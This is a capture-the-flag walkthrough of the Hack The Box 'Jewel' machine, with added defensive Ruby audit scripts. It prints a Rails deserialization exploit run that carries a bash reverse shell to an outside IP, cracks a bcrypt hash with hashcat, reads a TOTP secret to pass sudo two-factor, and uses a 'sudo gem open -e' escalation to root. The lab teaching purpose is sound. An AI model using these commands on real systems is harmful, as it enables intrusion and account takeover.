Hack The Box - Jewel: Insecure Deserialization

title: Hack The Box - Jewel: Insecure Deserialization
author: World'sEnd
layout: true
categories: Vulnerability Topics
tags: Vulnerability Notes


Hack The Box - Jewel

# Nmap 7.92 scan initiated Sun Apr 10 13:17:04 2022 as: nmap -sV -sC -Pn -T4 -p- -oA nmap.txt 10.10.10.211
Nmap scan report for 10.10.10.211
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-title: BL0G!
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 13:20:33 2022 -- 1 IP address (1 host up) scanned in 209.10 seconds

Port 22 shows a username-enumeration issue; I skip it for now. Port 8000 runs Apache httpd 2.4.38 and port 8080 runs nginx 1.14.2 (Phusion Passenger 6.0.6).

8000:

8080:

Exploring back and forth between the two web pages, I found a user named bill, which is a potential username, and then stumbled onto the following page:

http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff_plain;h=HEAD

That was enough to pin down a CVE:

Ruby on Rails deserialization remote code execution, CVE-2020-8165.

But I could not find a proper explanation of this vulnerability online; sources either skim over it or are vague. After searching through a lot of material, all I have is this one sentence:

A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3 and rails < 6.0.3.1 that may allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore, potentially resulting in RCE.
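The advisory sentence above gives only version ranges, so the one concrete thing a defender can check is the Rails version an application has pinned. The following Ruby script is an added example, not code from this post or from the Rails project: it reads a `Gemfile.lock` (the contents below are constructed, since the post does not show the real lockfile) and evaluates the resolved version against the ranges stated above. Function names are my own, and the treatment of branches older than 5.2 as affected is my assumption (they never received this fix).

```ruby
require "rubygems" # provides Gem::Version (loaded by default in modern Ruby)

# Fix releases named in the advisory sentence quoted above.
FIXED_5_2 = Gem::Version.new("5.2.4.3")
FIXED_6_0 = Gem::Version.new("6.0.3.1")

# True when a Rails version string falls in an affected range.
# Assumption (mine, not from the post): branches older than 5.2 never
# received this fix and are treated as affected; 6.1+ ships with it.
def rails_vulnerable?(version_string)
  v = Gem::Version.new(version_string)
  case v.segments[0, 2]
  when [5, 2] then v < FIXED_5_2
  when [6, 0] then v < FIXED_6_0
  else v < Gem::Version.new("5.2")
  end
end

# Extract the resolved rails version from a Gemfile.lock.
# The "rails (x.y.z)" spec line is matched; the "rails (~> x.y)" line under
# DEPENDENCIES is skipped because its parenthesised text does not start with a digit.
def rails_version_from_lock(lock_text)
  m = lock_text.match(/^[ \t]*rails \((\d[^)]*)\)[ \t]*$/)
  m && m[1]
end

def audit_lockfile(lock_text)
  version = rails_version_from_lock(lock_text)
  return "rails not found in lockfile" unless version
  status = rails_vulnerable?(version) ? "AFFECTED by CVE-2020-8165" : "not affected"
  "rails #{version}: #{status}"
end

# Constructed Gemfile.lock fragment; the post does not show the real one.
SAMPLE_GEMFILE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rails (5.2.2.1)
        actioncable (= 5.2.2.1)
        activesupport (= 5.2.2.1)
      redis (4.1.3)

  PLATFORMS
    ruby

  DEPENDENCIES
    rails (~> 5.2.2)
LOCK

if __FILE__ == $PROGRAM_NAME
  puts audit_lockfile(SAMPLE_GEMFILE_LOCK)
  %w[5.2.2.1 5.2.4.3 6.0.3 6.0.3.1 6.1.0].each do |ver|
    puts "#{ver}: #{rails_vulnerable?(ver) ? 'affected' : 'fixed'}"
  end
end
```

The mitigation is the one the advisory implies: move to 5.2.4.3 / 6.0.3.1 or later, and run this kind of check in CI so a lockfile that resolves into an affected range fails the build.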

Sorry, this time I cannot explain why the vulnerability arises either, because I do not know. I only found the following exploit script:

https://github.com/hybryx/CVE-2020-8165/blob/main/exploit.py

Accounts can be registered at the following page:

http://10.10.10.211:8080/signup

I cannot tell from the script what the vulnerability actually is either, since it only asks me for the target address, the credentials of the user I registered, the target port and the command to execute. Using it is simple:

python3 exploit.py 10.10.10.211 8080 worldisend@qq.com worldisend "bash -c 'bash -i >& /dev/tcp/10.10.16.9/8989 0>&1'"
nc -lvnp 8989
listening on [any] 8989 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.211] 47642
bash: cannot set terminal process group (792): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$ whoami
whoami
bill
bill@jewel:~/blog$

And so, without really understanding it, I got a reverse shell on the target: no vulnerability root cause, no deserialization injection point.

user.txt:

bill@jewel:/home$ cd bill
cd bill
bill@jewel:~$ ls
ls
blog
user.txt
bill@jewel:~$ cat user.txt

In the backup directory there is a pile of backups:

bill@jewel:/var/backups$ ls -all
ls -all
total 2468
drwxr-xr-x 2 root root 4096 Apr 10 08:26 .
drwxr-xr-x 12 root root 4096 Aug 27 2020 ..
-rw-r--r-- 1 root root 81920 Aug 26 2020 alternatives.tar.0
-rw-r--r-- 1 root root 51600 Sep 17 2020 apt.extended_states.0
-rw-r--r-- 1 root root 5415 Aug 28 2020 apt.extended_states.1.gz
-rw-r--r-- 1 root root 5363 Aug 27 2020 apt.extended_states.2.gz
-rw-r--r-- 1 root root 252 Aug 26 2020 dpkg.diversions.0
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.4.gz
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.5.gz
-rw-r--r-- 1 root root 156 Aug 26 2020 dpkg.diversions.6.gz
-rw-r--r-- 1 root root 173 Aug 26 2020 dpkg.statoverride.0
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 158 Aug 26 2020 dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 910140 Feb 8 2021 dpkg.status.0
-rw-r--r-- 1 root root 227505 Sep 18 2020 dpkg.status.1.gz
-rw-r--r-- 1 root root 227505 Sep 18 2020 dpkg.status.2.gz
-rw-r--r-- 1 root root 227505 Sep 18 2020 dpkg.status.3.gz
-rw-r--r-- 1 root root 227505 Sep 18 2020 dpkg.status.4.gz
-rw-r--r-- 1 root root 226834 Sep 17 2020 dpkg.status.5.gz
-rw-r--r-- 1 root root 222736 Aug 28 2020 dpkg.status.6.gz
-rw-r--r-- 1 root root 7828 Aug 27 2020 dump_2020-08-27.sql
-rw------- 1 root root 763 Aug 27 2020 group.bak
-rw------- 1 root shadow 637 Aug 27 2020 gshadow.bak
-rw------- 1 root root 1670 Aug 26 2020 passwd.bak
-rw------- 1 root shadow 1059 Aug 28 2020 shadow.bak
bill@jewel:/var/backups$

dump_2020-08-27.sql contains two hashes:

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
2 jennifer jennifer@mail.htb 2020-08-27 05:44:28.551735 2020-08-27 05:44:28.551735 $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
1 bill bill@mail.htb 2020-08-26 10:24:03.878232 2020-08-27 09:18:11.636483 $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW

jennifer's hash did not crack, but bill's did:

hashcat -m 3200 ./hash2.txt /usr/share/wordlists/rockyou.txt
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW:spongebob
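What makes this step possible is a permissions mistake rather than a cracking trick: `shadow.bak` next to the dump is mode 0600, while the database dump itself is 0644 and readable by any local user. As an added example (not code from this post), the Ruby below parses an `ls -l` listing and flags backup files that carry credential material yet are readable by others, then pulls the `password_digest` column out of the `COPY` block and decodes the bcrypt variant and cost factor. The listing and dump rows are constructed copies of the values shown above; function names are my own.

```ruby
# Names that typically hold credential material in /var/backups.
SENSITIVE_NAME = /\.(sql|bak|dump)(\.gz)?\z|shadow|passwd/i

# Split one `ls -l` line into its fields (9 pieces: the name may contain spaces).
def parse_ls_line(line)
  mode, _links, owner, group, _size, _month, _day, _year, name = line.split(" ", 9)
  { mode: mode, owner: owner, group: group, name: name }
end

# Mode string index 0 is the file type; indices 7..9 are the "other" rwx bits.
def other_readable?(mode)
  mode[7] == "r"
end

# Credential-bearing files in the listing that any local user can read.
def exposed_backups(ls_text)
  ls_text.lines.map(&:strip).reject(&:empty?)
         .map { |line| parse_ls_line(line) }
         .select { |f| f[:name].match?(SENSITIVE_NAME) && other_readable?(f[:mode]) }
         .map { |f| f[:name] }
end

# bcrypt modular-crypt format: $<variant>$<cost>$<22-char salt><31-char hash>.
def parse_bcrypt(digest)
  m = digest.match(%r{\A\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})\z})
  return nil unless m
  { variant: m[1], cost: m[2].to_i, salt: m[3], hash: m[4] }
end

# (username, password_digest) pairs from a pg_dump COPY block; rows are
# whitespace-separated here as on the page, and the digest is the last field.
def digests_from_copy(sql_text)
  lines = sql_text.lines.map(&:strip)
  header = lines.index { |l| l.start_with?("COPY public.users") }
  return [] unless header
  lines.drop(header + 1).reject { |l| l.empty? || l.start_with?("\\.") }.map do |row|
    fields = row.split
    [fields[1], fields.last]
  end
end

# Summary a defender would want: which files leak, and how costly the hashes are.
def report(ls_text, sql_text)
  costs = digests_from_copy(sql_text).map { |user, d| [user, parse_bcrypt(d)&.fetch(:cost)] }.to_h
  { exposed_files: exposed_backups(ls_text), bcrypt_costs: costs }
end

# Constructed subset of the listing and dump rows shown above.
LS_OUTPUT = <<~LS
  -rw-r--r-- 1 root root 910140 Feb 8 2021 dpkg.status.0
  -rw-r--r-- 1 root root 7828 Aug 27 2020 dump_2020-08-27.sql
  -rw------- 1 root root 763 Aug 27 2020 group.bak
  -rw------- 1 root shadow 637 Aug 27 2020 gshadow.bak
  -rw------- 1 root root 1670 Aug 26 2020 passwd.bak
  -rw------- 1 root shadow 1059 Aug 28 2020 shadow.bak
LS

SQL_DUMP = <<~SQL
  COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
  2 jennifer jennifer@mail.htb 2020-08-27 05:44:28.551735 2020-08-27 05:44:28.551735 $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
  1 bill bill@mail.htb 2020-08-26 10:24:03.878232 2020-08-27 09:18:11.636483 $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW
SQL

if __FILE__ == $PROGRAM_NAME
  p report(LS_OUTPUT, SQL_DUMP)
end
```

Cost 12 is a reasonable bcrypt work factor, and it still does not save a dictionary password such as the one recovered here; the fix is to keep database dumps at the same 0600 the system already applies to `shadow.bak`, and to keep weak passwords out of the table in the first place.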

I can try sudo -l, but it errors:

sudo: no tty present and no askpass program specified

I can upgrade the shell to fix this:

python3 -c 'import pty; pty.spawn("/bin/bash")'
bill@jewel:/var$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code:

OK, it seems another kind of verification is required. I remember seeing this in the user's home directory earlier:

-r--------  1 bill bill   56 Aug 28  2020 .google_authenticator
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
bill@jewel:~$

It feels like an advertisement for Google: I can install the GAuth Authenticator extension in the Chrome browser and then enter the secret from that file:

I then have a rotating six-digit code, much like the one from QQ Security Center, that refreshes every ten-odd seconds:
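The six-digit code is a TOTP (RFC 6238) value derived from the base32 secret on the first line of `.google_authenticator`, which is why that file is mode 0400: anyone able to read it can compute the second factor, so the file's permissions are the whole of its security. As an added example, not code from this post or from google-authenticator-libpam, the Ruby below implements base32 decoding, HOTP and TOTP, and parses the state file layout (secret, then `"`-prefixed options such as WINDOW_SIZE and TOTP_AUTH, then any scratch codes); the self-check at the bottom uses the published RFC 4226/6238 test vectors rather than the secret from the post. Function names are my own.

```ruby
require "openssl"

BASE32_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567".freeze

# RFC 4648 base32 decode (the encoding google-authenticator stores the secret in).
def base32_decode(str)
  bits = str.upcase.delete("=").each_char.map do |c|
    idx = BASE32_ALPHABET.index(c) or raise ArgumentError, "invalid base32 character #{c.inspect}"
    idx.to_s(2).rjust(5, "0")
  end.join
  usable = bits.length - (bits.length % 8) # drop trailing bits that do not fill a byte
  [bits[0, usable]].pack("B*")
end

# RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, N digits.
def hotp(key, counter, digits = 6)
  hmac = OpenSSL::HMAC.digest("SHA1", key, [counter].pack("Q>")).bytes
  offset = hmac[19] & 0x0f
  code = ((hmac[offset] & 0x7f) << 24) | (hmac[offset + 1] << 16) | (hmac[offset + 2] << 8) | hmac[offset + 3]
  (code % 10**digits).to_s.rjust(digits, "0")
end

# RFC 6238 TOTP: HOTP with counter = floor(unix_time / step); the default 30 s step
# is what produces the code rotation seen in the authenticator extension.
def totp(base32_secret, unix_time, step: 30, digits: 6)
  hotp(base32_decode(base32_secret), unix_time / step, digits)
end

# Parse a google-authenticator-libpam state file: line 1 is the base32 secret,
# lines beginning with `"` are options (e.g. WINDOW_SIZE 17, TOTP_AUTH),
# any remaining lines are one-time scratch codes.
def parse_google_authenticator(text)
  lines = text.lines.map(&:strip).reject(&:empty?)
  secret = lines.shift
  options = {}
  scratch = []
  lines.each do |l|
    if l.start_with?('"')
      key, value = l.delete_prefix('"').strip.split(" ", 2)
      options[key] = value # nil for flag-style options such as TOTP_AUTH
    else
      scratch << l
    end
  end
  { secret: secret, options: options, scratch_codes: scratch }
end

# Constructed copy of the file contents shown above.
SAMPLE_GA_FILE = <<~GA
  2UQI3R52WFCLE6JTLDCSJYMJH4
  " WINDOW_SIZE 17
  " TOTP_AUTH
GA

# RFC 6238 Appendix B SHA-1 seed, "12345678901234567890", in base32.
RFC_SEED_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ".freeze

if __FILE__ == $PROGRAM_NAME
  state = parse_google_authenticator(SAMPLE_GA_FILE)
  puts "options: #{state[:options].inspect}"
  puts "RFC vector T=59         -> #{totp(RFC_SEED_B32, 59)} (expected 287082)"
  puts "RFC vector T=1111111109 -> #{totp(RFC_SEED_B32, 1_111_111_109)} (expected 081804)"
end
```

WINDOW_SIZE 17 in the state file widens how many adjacent 30-second steps the PAM module accepts, so a defender reviewing such a file should treat a large window, a world-readable mode, or unused scratch codes left in place as findings.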

Then I can use sudo successfully:

bill@jewel:~$ sudo -l
sudo -l
[sudo] password for bill:

I think ... err ... I think ... I think I'll go home
[sudo] password for bill:

I feel much better now.
[sudo] password for bill: spongebob

Verification code: 627125

Matching Defaults entries for bill on jewel:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
insults

User bill may run the following commands on jewel:
(ALL : ALL) /usr/bin/gem
bill@jewel:~$

But with sudo I can only run /usr/bin/gem. I got the usage information for gem from the following page:

https://gtfobins.github.io/gtfobins/gem/

I can do this:

sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
bill@jewel:~$ sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)

root.txt:

# cat /root/root.txt
cat /root/root.txt
